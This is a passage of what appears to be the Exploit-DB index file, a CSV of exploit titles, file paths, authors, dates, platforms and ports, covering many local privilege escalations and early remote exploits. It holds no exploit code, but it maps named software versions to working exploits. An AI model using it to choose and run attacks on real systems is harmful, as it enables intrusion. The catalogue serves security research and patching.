Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local, -41871,exploits/solaris/local/41871.sh,"Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local, -41873,exploits/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local, -41875,exploits/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",linux,local, -41878,exploits/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation",2017-04-13,hyp3rlinx,windows,local, -42548,exploits/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local, -41901,exploits/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local, -41902,exploits/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local, -41904,exploits/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local, -41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local, -41908,exploits/win_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",win_x86-64,local, -41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local, -41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local, -41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local, -41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",osx,local, -41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",macos,local, -41955,exploits/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local, -41959,exploits/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local, -41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local, -41971,exploits/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local, -41973,exploits/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local, -41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local, -41995,exploits/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local, -41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local, -42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local, -42020,exploits/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local, -42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local, -42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,linux,local, -42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local, -42076,exploits/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local, -42077,exploits/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local, -42116,exploits/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local, -42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local, -42121,exploits/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local, -42141,exploits/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",windows,local, -42142,exploits/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local, -42145,exploits/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local, -42146,exploits/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local, -42157,exploits/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local, -42160,exploits/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local, -42161,exploits/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local, -42163,exploits/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local, -42174,exploits/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Local Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local, -42181,exploits/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local, -42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local, -42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-06-26,"Juan Sacco",linux,local, -42265,exploits/linux/local/42265.py,"Flat Assembler 1.7.21 - Local Buffer Overflow",2017-06-28,"Juan Sacco",linux,local, -42267,exploits/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local, -42270,exploits/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local, -42271,exploits/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local, -42273,exploits/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' Stack Clash",2017-06-28,"Qualys Corporation",lin_x86,local, -42274,exploits/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local, -42275,exploits/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local, -42276,exploits/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local, -42542,exploits/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,windows,local, -42310,exploits/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Local Privilege Escalation",2017-07-10,LiquidWorm,windows,local, -42319,exploits/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Local Privilege Escalation",2017-07-13,geoda,windows,local, -42325,exploits/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local, -42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local, -42356,exploits/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local, -42357,exploits/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local, -42368,exploits/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local, -42382,exploits/windows/local/42382.rb,"Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local, -42549,exploits/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local, -42385,exploits/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local, -42407,exploits/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local, -42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local, -42424,exploits/linux/local/42424.py,"DNSTracer 1.9 - Local Buffer Overflow",2017-08-03,j0lama,linux,local, -42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local, -42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local, -42429,exploits/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local, -42432,exploits/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local, -42435,exploits/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local, -42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,macos,local, -42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local, -42456,exploits/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local, -42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",osx,local, -42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local, -42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local, -42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local, -42538,exploits/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local, -42539,exploits/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local, -42540,exploits/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local, -42565,exploits/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local, -42567,exploits/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Local Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local, -42568,exploits/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Local Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local, -42586,exploits/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local, -42601,exploits/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local, -42605,exploits/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Local Privilege Escalation",2017-09-02,ParagonSec,windows,local, -42611,exploits/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local, -42612,exploits/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local, -42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1)",2017-09-06,mr_me,windows,local, -42625,exploits/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local, -42626,exploits/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local, -42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2)",2017-09-12,mr_me,windows,local, -42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local, -42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local, -42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local, -42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local, -42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local, -42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local, -42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",windows,local, -42936,exploits/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,linux,local, -42937,exploits/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local, -42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local, -42951,exploits/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local, -42960,exploits/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local, -42963,exploits/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local, -42974,exploits/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow",2017-10-11,"Parichay Rai",windows,local, -43006,exploits/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839 -43007,exploits/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local, -43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local, -43029,exploits/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation",2017-10-22,"@XeR_0x2A & @chaign_c",linux,local, -43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,windows,local, -43056,exploits/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",php,local, -43057,exploits/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local, -43104,exploits/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local, -43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local, -43127,exploits/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",linux,local, -43134,exploits/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,windows,local, -43139,exploits/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local, -43156,exploits/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)",2017-11-16,wetw0rk,windows,local, -43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",windows,local, -43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,windows,local, -1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,windows,remote,80 -2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 -5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",windows,remote,139 -7,exploits/linux/remote/7.pl,"Samba 2.2.x - Remote Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 -8,exploits/linux/remote/8.c,"SETI@home Clients - Remote Buffer Overflow",2003-04-08,zillion,linux,remote, -10,exploits/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139 -16,exploits/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 -18,exploits/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote, -19,exploits/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 -20,exploits/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Overflow",2003-04-25,"Haamed Gheibi",windows,remote,139 -23,exploits/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Overflow",2003-04-30,"Johnny Cyberpunk",windows,remote,554 -24,exploits/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,linux,remote,25 -25,exploits/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote, -26,exploits/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote, -27,exploits/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking",2003-05-05,"Yaroslav Polyakov",linux,remote,80 -28,exploits/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote, -30,exploits/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote, -33,exploits/linux/remote/33.c,"WsMp3d 0.x - Remote Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 -34,exploits/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution",2003-05-29,anonymous,linux,remote,80 -36,exploits/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 -37,exploits/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag (MS03-020)",2003-06-07,alumni,windows,remote, -39,exploits/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 -41,exploits/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 -42,exploits/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 -43,exploits/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 -45,exploits/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow",2003-06-23,Rave,windows,remote,80 -46,exploits/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 -48,exploits/windows/remote/48.c,"Microsoft Windows Media Services - Remote (MS03-022)",2003-07-01,firew0rker,windows,remote,80 -49,exploits/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings",2003-07-02,B-r00t,linux,remote,25 -50,exploits/windows/remote/50.pl,"ColdFusion MX - Remote Development Service",2003-07-07,"angry packet",windows,remote,80 -51,exploits/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 -54,exploits/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 -55,exploits/linux/remote/55.c,"Samba 2.2.8 - Brute Force Method Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 -56,exploits/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow",2003-07-14,anonymous,windows,remote,80 -57,exploits/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote, -58,exploits/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Overflow",2003-07-17,"Carl Livitt",linux,remote,504 -63,exploits/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 -64,exploits/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 -66,exploits/windows/remote/66.c,"Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 -67,exploits/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 -69,exploits/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote (1)",2003-07-29,pHrail,windows,remote,135 -70,exploits/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote (2)",2003-07-30,anonymous,windows,remote,135 -74,exploits/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21 -76,exploits/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote (Universal)",2003-08-07,oc192,windows,remote,135 -77,exploits/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80 -78,exploits/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Command Execution",2003-08-11,Xpl017Elz,linux,remote,21 -80,exploits/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100 -81,exploits/windows/remote/81.c,"Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote, -83,exploits/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote (MS03-032)",2003-08-21,malware,windows,remote, -84,exploits/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70 -86,exploits/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 -88,exploits/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Buffer Overflow",2003-08-28,vade79,linux,remote,21 -89,exploits/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Overflow",2003-08-29,vertex,linux,remote,23 -90,exploits/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 -92,exploits/windows/remote/92.c,"Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5/SP6 French) - File Template Buffer Overflow (MS03-036)",2003-09-06,valgasu,windows,remote, -95,exploits/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow",2003-09-10,"Luigi Auriemma",multiple,remote, -96,exploits/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow",2003-09-11,B-r00t,osx,remote,21 -97,exploits/windows/remote/97.c,"Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 -98,exploits/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Buffer Overflow",2003-09-14,bkbll,linux,remote,3306 -99,exploits/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,linux,remote, -100,exploits/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135 -101,exploits/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Code Execution",2003-09-19,"H D Moore",solaris,remote,111 -102,exploits/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617 -103,exploits/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)",2003-09-20,Flashsky,windows,remote,135 -105,exploits/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 -107,exploits/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)",2003-10-04,bkbll,linux,remote,21 -109,exploits/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 -110,exploits/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 -112,exploits/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote, -116,exploits/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Overflow",2003-11-04,xCrZx,windows,remote,515 -117,exploits/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote Non Exec Memory",2003-11-07,ins1der,windows,remote,135 -119,exploits/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote, -121,exploits/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)",2003-11-13,Adik,windows,remote,80 -123,exploits/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)",2003-11-14,snooq,windows,remote, -124,exploits/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow",2003-11-19,"Peter Winter-Smith",windows,remote,80 -126,exploits/linux/remote/126.c,"Apache mod_gzip 